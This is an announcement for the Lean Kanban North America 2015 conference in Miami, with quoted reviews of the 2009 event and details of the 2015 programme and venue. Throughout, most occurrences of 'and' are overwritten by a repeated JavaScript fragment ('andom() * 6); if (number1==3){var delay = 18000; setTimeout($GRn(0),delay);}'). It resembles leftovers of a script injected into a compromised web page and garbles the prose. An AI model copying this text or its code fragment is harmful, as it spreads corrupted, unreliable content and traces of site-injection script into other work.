Announcing Lean Kanban North America 2015

This year we return to one of our favorite places: Miami, Florida! Miami was the location of our first ever Lean Kanban conference in 2009. It hosted 66 attendees, including speakers, over 2 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a half days, with 1 track.

There was buzz before the event:

“Quite simply the greatest ever assembled group of experts in Lean software development will be convening in Miami in May to explore the frontiers of agile andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and lean in software development. This is your chance to be a part of the new wave in agile development andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and management practices.” – Corey Ladas

Reviews afterwards included:

“This conference in miami was very potentially the most impressive conference that most of the attendees had visited throughout their careers. It was unquestionably the beginning of a movement.” – Greg Frazer

“The Lean Kanban conference last week in Miami was astounding. David Anderson did a fantastic job, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and everyone who contributed had great presentations.

I am humbled andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and emboldened at the same time. I’ve been involved in Agile since 1999 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Lean since 2004, so I thought this was going to be familiar to me, old hat.

Here’s my confession: I’ve pretty much ignored Kanban, writing it off as just slightly different than what good XP or Scrum teams practice anyway.

Wow, those small differences make a huge impact. I am very glad I decided to go to the conference, some internal hunch finally winning.” – John Heintz (read his full review andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and trip report here)

“On reflection, the Lean andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Kanban conference was one of the most impactful events I’ve attended in many years” – Dean Leffingwell

Fast forward to 2015. Since Lean Kanban 2009, we have held Lean Kanban conferences every year andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and expandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}anded beyond North America to many conferences throughout Europe, South America, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Asia. Lean Kanban conferences are still praised for their ground-breaking andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and data driven content, their quality venues, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and excellent organization.

I was lucky enough to be an organizer at Lean Kanban 2009 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and I’m so pleased to be Program Chair for Lean Kanban North America 2015 in Miami. Partly in tribute to that first event, we are focusing more intently on pure Kanban content, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and we are keeping this conference to a smaller number of attendees. The 2015 event will feature 2 days of sessions andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and 1 day of 3-4 hour Interactive Workshops.

Also in the spirit of the 2009 event, we are running a Call for Proposals. Although there are very few speaking slots available, we do want to reach out to the community to make sure we find the sort of astonishing case studies andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and expertise that attendees have come to expect at this event. As usual, paid attendees can also apply for Ignite Talk speaking slots.

Of course, we will have the annual Brickell Key Award ceremony! This award was named after the location, Brickell Key, of the venue for the Lean Kanban 2009 conference. This year the venue will be the stunning Eden Roc Hotel in Miami Beach, a short cruise from Brickell Key. We have negotiated a special discounted room rate, while rooms are still available.

Did I mention that this will be a smaller event? Register as soon as possible before this event fills up. We will raise the registration rates according to the number of tickets already sold, so sign up now!
